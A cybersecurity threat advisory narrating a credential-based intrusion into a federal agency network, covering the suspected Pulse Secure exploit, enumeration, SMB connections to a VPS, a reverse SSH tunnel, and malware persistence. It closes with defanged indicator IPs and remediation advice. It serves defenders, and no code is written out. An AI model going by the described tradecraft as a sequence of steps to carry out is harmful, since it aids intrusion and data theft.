Rewterz Threat Advisory -ICS: B&R Automation SiteManager and GateManager
October 1, 2020Rewterz Threat Alert – Nanocore RAT – IOCs
October 1, 2020Rewterz Threat Advisory -ICS: B&R Automation SiteManager and GateManager
October 1, 2020Rewterz Threat Alert – Nanocore RAT – IOCs
October 1, 2020Severity
High
Analysis Summary
A potential network compromise incident is reported on a federal agency’s enterprise network in which the cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and domain administrator accounts. These credentials were used for initial access to the organization’s network. First the threat actor logged into a user’s O365 account and then browsed pages on a SharePoint site and downloaded a file. The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) to the victim organization’s virtual private network (VPN) server. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure, as wide exploitation of CVE-2019-11510 has already been observed.
After initial access, the threat actor logged into an agency O365 email account for viewing and downloading help desk email attachments with “Intranet access” and “VPN passwords” in the subject line, despite already having privileged access. (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) and enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy. Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe—to enumerate the compromised system and network.
The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS via an SMB share. The attacker then executed plink.exe on a victim file server.
The cyber threat actor established Persistence and Command and Control on the victim network by creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, by running inetinfo.exe (a unique, multi-stage malware used to drop files), and by setting up a locally mounted remote share on IP address 78.27.70[.]237. The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. The cyber threat actor created a local account, which they used for data Collection, Exfiltration. Persistence and Command and Control.
Impact
- Privilege Abuse
- Data Manipulation
- Data Exfiltration
- Information Theft
Indicators of Compromise
Source IP
- 91[.]219[.]236[.]166
- 185[.]86[.]151[.]223
- 207[.]220[.]1[.]3
- 185[.]193[.]127[.]18
- 78[.]27[.]70[.]237
Remediation
- Block the threat indicators at their respective controls.
- Enable multi-factor authentication for all accounts to avoid unauthorized use of stolen credentials.
- Patch all known vulnerabilities as soon as an update is available.
- Monitor network traffic for unusual activity like unusual open ports, large outbound files and unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP)
- Implement the principle of least privilege on data access.